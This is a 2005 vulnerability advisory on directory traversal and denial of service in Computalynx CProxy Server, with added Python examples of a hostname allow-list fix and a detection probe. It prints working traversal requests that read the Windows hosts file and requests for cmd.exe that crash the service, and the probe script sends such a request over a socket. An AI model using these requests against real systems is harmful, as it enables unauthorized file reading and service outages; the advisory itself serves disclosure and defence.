Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities


 



+=========================================================================================+
| Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities |
+=========================================================================================+
| kristof.philipsen@xxxxxxxxxx March 02, 2005 |
+=========================================================================================+




AFFECTED PRODUCTS

Affected Software:

 - Computalynx CProxy 3.3.x for Win32
 - Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32

Possibly other software versions are affected.



IDENTIFIED ISSUES

The following issues were found to affect the aforementioned Computalynx CProxy Server software:

 [1] Directory Traversal and Arbitrary File Access Attack
 [2] Denial-of-Service Attack



BRIEF DESCRIPTION

Computalynx CProxy is a Windows-based proxy server offering HTTP, Telnet, POP3, SMTP and FTP
proxy functions, as well as anti-virus and content-filtering capabilities. Because of
inadequate input validation, a remote attacker can perform a directory traversal attack and
thus read arbitrary files located on the CProxy Server system. Moreover, using the same attack
vector with specially crafted HTTP requests, it is possible to crash the CProxy service running
on the remote system.




DETAILED DESCRIPTION

Computalynx CProxy Server is a multifunctional Windows-based proxy server with multi-protocol
support. When performing its proxy functions, CProxy Server is vulnerable to a directory
traversal attack. Inadequate input validation and filtering allows a remote attacker to gain
access to arbitrary files on the Windows system on which the CProxy Server software has been
deployed. The directory traversal issue stems from the fact that CProxy Server fails to filter
out double-dot ("..") sequences where a hostname would normally appear in a proxied URL, and
consequently fails to protect arbitrary local files from being requested and opened through
the proxy service. A specially crafted URL therefore allows arbitrary files to be retrieved
from the system. The retrieval of system files can compromise the entire system or expose it
to further avenues of attack. An attacker can issue a request of the following form to gain
access to arbitrary data:


GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>

An attacker can gain access to a file in the WINNT directory, as shown in the following example,
by connecting to CProxy Server's proxy service (listening on TCP port 8080 by default) and
issuing the following request:



ronin[kris] ~ $ telnet 10.0.0.1 8080
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0


HTTP/1.0 200 OK
Content-length: 734
Date: Sat, 19 Feb 2005 21:09:58 GMT
Date: Sat, 19 Feb 2005 21:09:58 GMT
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host


127.0.0.1 localhost
Connection closed by foreign host.



In conjunction with this method, other HTTP methods such as "POST" and "HEAD" also lead to
arbitrary file retrieval.
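What the missing validation should have looked like, as an added Python example written for
this advisory (it is not CProxy code, which is closed-source Win32 software and is not shown
here): parse the absolute-URI request line exactly as a forward proxy receives it and refuse
anything whose host component is not a syntactically valid hostname, which is precisely the
check that "http://../../..." fails. The method allow-list, the RFC 1123 hostname grammar and
the extra path rules are choices made for the example, not behaviour derived from the product.

```python
import re

ALLOWED_METHODS = ("GET", "HEAD", "POST")

# RFC 1123 hostname grammar: labels of letters, digits and hyphens, joined by
# single dots.  Nothing in this grammar can contain "..", "/" or "\", so a
# host that passes it can never be mistaken for a filesystem path.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


class BadProxyRequest(ValueError):
    """Raised for any request line the proxy must refuse to service."""


def parse_proxy_request_line(line: str):
    """Parse 'METHOD http://host[:port]/path HTTP/x.y' as a forward proxy sees it.

    Returns (method, host, port, path) or raises BadProxyRequest.  The check
    is an allow-list: the host must be a well-formed hostname, the path must
    contain no dot segments or backslashes, and only http:// URIs are accepted.
    """
    parts = line.strip().split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise BadProxyRequest("malformed request line")
    method, target, _version = parts
    if method not in ALLOWED_METHODS:
        raise BadProxyRequest(f"method not allowed: {method}")
    if target[:7].lower() != "http://":
        raise BadProxyRequest("only absolute http:// URIs are proxied")

    authority, _, path = target[7:].partition("/")
    path = "/" + path                      # partition drops the separator
    host, _, port_str = authority.partition(":")

    if not _HOSTNAME_RE.match(host):       # rejects "..", "", "..:80", "-x" ...
        raise BadProxyRequest(f"invalid host: {host!r}")
    if port_str:
        if not port_str.isdigit() or not 1 <= int(port_str) <= 65535:
            raise BadProxyRequest(f"invalid port: {port_str!r}")
        port = int(port_str)
    else:
        port = 80
    # Defence in depth: a proxy that maps URLs onto local files (as the
    # advisory shows CProxy doing) must also refuse dot segments and
    # backslashes in the path, since Windows treats "\" as a separator too.
    if "\\" in path or any(seg in (".", "..") for seg in path.split("/")):
        raise BadProxyRequest(f"dot segment or backslash in path: {path!r}")
    return method, host, port, path


def accepts(line: str) -> bool:
    """Convenience wrapper: True if the request line would be serviced."""
    try:
        parse_proxy_request_line(line)
    except BadProxyRequest:
        return False
    return True


if __name__ == "__main__":
    # The advisory's own request lines run through the check.
    for req in (
        "GET http://www.example.com/index.html HTTP/1.0",
        "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0",
        "POST http://../../../../../winnt/system32/cmd.exe HTTP/1.0",
    ):
        print(f"{'ACCEPT' if accepts(req) else 'REJECT'}  {req}")
```

The point is that the host is validated against a positive grammar rather than by stripping
".." out of a string: a blacklist of "../" is trivially bypassed with "..\" or URL-encoded
variants, whereas nothing that matches the hostname grammar can ever be joined to a local
path. The example deliberately does not accept IPv6 literals or userinfo in the authority;
a production proxy would extend the grammar rather than loosen the check.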


Retrieving an arbitrary ASCII file using the "GET" method causes the file to be displayed and,
immediately afterwards, causes the CProxy Server service to crash with an error message
indicating that "memory could not be read". Retrieving the same ASCII file using the "POST" or
"HEAD" methods, however, causes the file contents to be displayed without crashing the CProxy
Server service, allowing an attacker to issue multiple requests and thus retrieve various
arbitrary files from the CProxy Server system.


 * The following request will cause the arbitrary file to be displayed:

   -> "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

 * The following request will cause the arbitrary file to be displayed and the CProxy Server
   service to crash:

   -> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

Attempting to retrieve an executable file using any of these HTTP methods ("GET", "HEAD" or
"POST") in the aforementioned manner causes the contents of the executable to be displayed and
the CProxy Server service to crash with an error message that "memory could not be read",
rendering the service unavailable and thus resulting in a Denial-of-Service condition.

 * Both of the following requests will cause the arbitrary executable's contents to be displayed
   and the CProxy Server service to crash:

   -> "GET http://../../../../../winnt/system32/cmd.exe"
   -> "POST http://../../../../../winnt/system32/cmd.exe"
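A non-destructive check for the condition described above, added here as an example and not
part of the original advisory or of any Computalynx software. It builds the advisory's request
with the HEAD method (which, per the advisory, returns an ASCII file without crashing the
service, whereas GET crashes it) and flags the proxy as vulnerable only if the reply is a 200
carrying the stock hosts-file text. The lab address 10.0.0.1, the "localhost" marker string and
the sample reply below are assumptions constructed for the example; never point this at
cmd.exe, since the advisory reports that retrieving an executable crashes the service with
every method.

```python
import socket

# Constructed sample reply, modelled on the transcript in the advisory; it is
# not a live capture.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-length: 734\r\n"
    b"Date: Sat, 19 Feb 2005 21:09:58 GMT\r\n"
    b"\r\n"
    b"# Copyright (c) 1993-1999 Microsoft Corp.\r\n"
    b"#\r\n"
    b"# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n"
    b"127.0.0.1 localhost\r\n"
)

# Every stock Windows hosts file carries a "localhost" line, so its presence in
# the body is a usable sign that the proxy served its own local file.
HOSTS_MARKER = b"localhost"


def build_probe(method: str = "HEAD", depth: int = 5,
                target: str = "winnt/system32/drivers/etc/hosts") -> bytes:
    """Build the raw absolute-URI request from the advisory.

    Five "../" segments mirror the advisory's own request.  HEAD is the
    default because the advisory reports that GET crashes the service after
    returning an ASCII file, while HEAD and POST do not.
    """
    if method == "GET":
        raise ValueError("GET crashes the service per the advisory; use HEAD or POST")
    return f"{method} http://{'../' * depth}{target} HTTP/1.0\r\n\r\n".encode("ascii")


def parse_response(raw: bytes):
    """Return (status_code or None, {header_name: [values]}, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    if not sep:
        # The advisory's transcript shows headers running straight into the
        # body with no blank line; keep everything after the status line as
        # body rather than silently dropping it.
        head, _, body = raw.partition(b"\n")
    lines = head.splitlines()
    status = None
    if lines:
        parts = lines[0].split(maxsplit=2)
        if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
            status = int(parts[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def is_traversal_result(raw: bytes, marker: bytes = HOSTS_MARKER) -> bool:
    """True if the reply is a 200 whose body contains the hosts-file marker."""
    status, _, body = parse_response(raw)
    return status == 200 and marker in body


def probe(host: str, port: int = 8080, timeout: float = 5.0) -> bool:
    """Send one HEAD probe to the proxy listener and evaluate the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe())
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return is_traversal_result(b"".join(chunks))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.0.0.1"   # assumed lab address
    print("vulnerable" if probe(target) else "no hosts-file content returned")
```

A negative result from this check is weak evidence (a non-English or customised hosts file,
or a listener on a different port, will not carry the marker); a positive result is strong,
because a forward proxy has no legitimate reason to answer a request for "http://.." with
the contents of a local file.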



CHARACTERISTICS

* Inadequate input validation and filtering allows an attacker to perform directory traversal
attacks against systems running Computalynx CProxy Server.


* Several attack vectors (the "GET", "HEAD" and "POST" methods) allow retrieval of arbitrary
and possibly sensitive files from the system running Computalynx CProxy Server.


* Use of specially crafted URLs allows attackers to render the service unavailable, causing a
Denial-of-Service condition.




SEVERITY

Each of these two issues affecting Computalynx CProxy Server software can directly or indirectly
allow partial or complete compromise of the system and/or the data stored on the system running
the CProxy Server software.


Moreover, the second issue regarding a Denial-of-Service attack against the CProxy Server
software will directly affect any users depending on the availability of the functions which the
CProxy Software performs on this system.


Classification: MEDIUM to HIGH



VENDOR STATUS

19/Feb/2005 - Computalynx contacted regarding this issue.
02/Mar/2005 - At present, the vendor has not replied regarding this issue.



SOLUTION

* Currently awaiting vendor status for a solution regarding this issue.

* A mitigation strategy against attacks of this nature is to ensure that connections to the
CProxy Server from untrusted networks are not permitted (i.e. through the use of proper firewall
rules, such as restricting access to the proxy listener on TCP port 8080 to trusted clients).




REFERENCES

[1] "Computalynx Software"
   - http://www.computalynx.com



--
Kristof Philipsen
Security Engineer


Ubizen - a Cybertrust company
18 rue Robert Stumper
L-2557 Luxembourg
Luxembourg
T: +352 26 31 05 85
F: +352 26 31 05 86
E-mail: kristof.philipsen@xxxxxxxxxx

www.ubizen.com - www.cybertrust.com

